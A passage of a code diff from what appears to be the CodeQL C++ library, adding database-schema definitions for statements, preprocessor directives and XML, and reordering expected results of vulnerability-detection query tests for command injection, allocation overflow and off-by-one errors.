+sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + 
boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 
34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int 
for_stmt: @stmt_for ref,
+ int condition_id: @expr ref
+);
+
+for_update(
+ unique int for_stmt: @stmt_for ref,
+ int update_id: @expr ref
+);
+
+for_body(
+ unique int for_stmt: @stmt_for ref,
+ int body_id: @stmt ref
+);
+
+@stmtparent = @stmt | @expr_stmt ;
+stmtparents(
+ unique int id: @stmt ref,
+ int index: int ref,
+ int parent: @stmtparent ref
+);
+
+ishandler(unique int block: @stmt_block ref);
+
+@cfgnode = @stmt | @expr | @function | @initialiser ;
+
+stmt_decl_bind(
+ int stmt: @stmt_decl ref,
+ int num: int ref,
+ int decl: @declaration ref
+);
+
+stmt_decl_entry_bind(
+ int stmt: @stmt_decl ref,
+ int num: int ref,
+ int decl_entry: @element ref
+);
+
+@parameterized_element = @function | @stmt_block | @requires_expr;
+
+blockscope(
+ unique int block: @stmt_block ref,
+ int enclosing: @parameterized_element ref
+);
+
+@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave;
+
+@jumporlabel = @jump | @stmt_label | @literal;
+
+jumpinfo(
+ unique int id: @jumporlabel ref,
+ string str: string ref,
+ int target: @stmt ref
+);
+
+preprocdirects(
+ unique int id: @preprocdirect,
+ int kind: int ref,
+ int location: @location_default ref
+);
+case @preprocdirect.kind of
+ 0 = @ppd_if
+| 1 = @ppd_ifdef
+| 2 = @ppd_ifndef
+| 3 = @ppd_elif
+| 4 = @ppd_else
+| 5 = @ppd_endif
+| 6 = @ppd_plain_include
+| 7 = @ppd_define
+| 8 = @ppd_undef
+| 9 = @ppd_line
+| 10 = @ppd_error
+| 11 = @ppd_pragma
+| 12 = @ppd_objc_import
+| 13 = @ppd_include_next
+| 14 = @ppd_ms_import
+| 15 = @ppd_elifdef
+| 16 = @ppd_elifndef
+| 17 = @ppd_embed
+| 18 = @ppd_warning
+;
+
+@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import;
+
+@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef;
+
+preprocpair(
+ int begin : @ppd_branch ref,
+ int elseelifend : @preprocdirect ref
+);
+
+preproctrue(int branch : @ppd_branch ref);
+preprocfalse(int branch : @ppd_branch ref);
+
+preproctext(
+ unique int id: @preprocdirect ref,
+ string head: string ref,
+ string body: string ref
+);
+
+includes(
+ unique int id: @ppd_include ref,
+ int included: @file ref
+);
+
+embeds(
+ unique int id: @ppd_embed ref,
+ int included: @file ref
+);
+
+link_targets(
+ int id: @link_target,
+ int binary: @file ref
+);
+
+link_parent(
+ int element : @element ref,
+ int link_target : @link_target ref
+);
+
+/*- Database metadata -*/
+
+/**
+ * The CLI will automatically emit applicable tuples for this table,
+ * such as `databaseMetadata("isOverlay", "true")` when building an
+ * overlay database.
+ */
+databaseMetadata(
+ string metadataKey: string ref,
+ string value: string ref
+);
+
+/*- Overlay support -*/
+
+/**
+ * The CLI will automatically emit tuples for each new/modified/deleted file
+ * when building an overlay database.
+ */
+overlayChangedFiles(
+ string path: string ref
+);
+
+/*- XML Files -*/
+
+xmlEncoding(
+ unique int id: @file ref,
+ string encoding: string ref
+);
+
+xmlDTDs(
+ unique int id: @xmldtd,
+ string root: string ref,
+ string publicId: string ref,
+ string systemId: string ref,
+ int fileid: @file ref
+);
+
+xmlElements(
+ unique int id: @xmlelement,
+ string name: string ref,
+ int parentid: @xmlparent ref,
+ int idx: int ref,
+ int fileid: @file ref
+);
+
+xmlAttrs(
+ unique int id: @xmlattribute,
+ int elementid: @xmlelement ref,
+ string name: string ref,
+ string value: string ref,
+ int idx: int ref,
+ int fileid: @file ref
+);
+
+xmlNs(
+ int id: @xmlnamespace,
+ string prefixName: string ref,
+ string URI: string ref,
+ int fileid: @file ref
+);
+
+xmlHasNs(
+ int elementId: @xmlnamespaceable ref,
+ int nsId: @xmlnamespace ref,
+ int fileid: @file ref
+);
+
+xmlComments(
+ unique int id: @xmlcomment,
+ string text: string ref,
+ int parentid: @xmlparent ref,
+ int fileid: @file ref
+);
+
+xmlChars(
+ unique int id: @xmlcharacters,
+ string text: string ref,
+ int parentid: @xmlparent ref,
+ int idx: int ref,
+ int isCDATA: int ref,
+ int fileid: @file ref
+);
+
+@xmlparent = @file | @xmlelement;
+@xmlnamespaceable = @xmlelement | @xmlattribute;
+
+xmllocations(
+ int xmlElement: @xmllocatable ref,
+ int location: @location_default ref
+);
+
+@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace;
diff --git a/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties
new file mode 100644
index 000000000000..d3a842d2cbb5
--- /dev/null
+++ b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties
@@ -0,0 +1,2 @@
+description: Fix NameQualifier inconsistency
+compatibility: full
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected index b03a1ff7040e..e3afe00da6ef 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected @@ -1,5 +1,3 @@ -#select -| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | edges | test.cpp:22:27:22:30 | **argv | test.cpp:23:20:23:26 | *access to array | provenance | | | test.cpp:23:20:23:26 | *access to array | test.cpp:29:13:29:20 | *filePath | provenance | | 
@@ -8,3 +6,5 @@ nodes | test.cpp:23:20:23:26 | *access to array | semmle.label | *access to array | | test.cpp:29:13:29:20 | *filePath | semmle.label | *filePath | subpaths +#select +| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected index 2d714cac53e6..c55008f6550c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected 
@@ -1,13 +1,3 @@ -#select -| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | -| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | -| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | -| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | -| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | -| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | -| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... 
| test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | edges | test.cpp:22:17:22:21 | ... * ... | test.cpp:22:17:22:21 | ... * ... | provenance | | | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | provenance | | 
@@ -28,3 +18,13 @@ nodes | test.cpp:45:36:45:40 | ... * ... | semmle.label | ... * ... | | test.cpp:46:36:46:40 | ... * ... | semmle.label | ... * ... | subpaths +#select +| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | +| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | +| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | +| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | +| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | +| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | +| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... 
| Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected index ec17b2bd2f4a..b343a4b47ede 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected 
@@ -1,22 +1,3 @@ -#select -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. 
| test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | -| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. 
| test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | edges | test.cpp:4:17:4:22 | call to malloc | test.cpp:4:17:4:22 | call to malloc | provenance | | | test.cpp:4:17:4:22 | call to malloc | test.cpp:6:9:6:11 | arr | provenance | | 
@@ -118,3 +99,22 @@ nodes | test.cpp:98:18:98:27 | test6_callee output argument [p] | semmle.label | test6_callee output argument [p] | subpaths | test.cpp:98:18:98:27 | *call to mk_array_p [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:98:18:98:27 | test6_callee output argument [p] | +#select +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. 
| test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. 
| test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | +| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected index 1aa7c546e12e..a4c154c06940 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected 
@@ -1,25 +1,3 @@ -#select -| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | -| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | -| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | -| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | -| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | -| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... 
| write | -| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | -| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | -| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | -| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | -| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | -| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. 
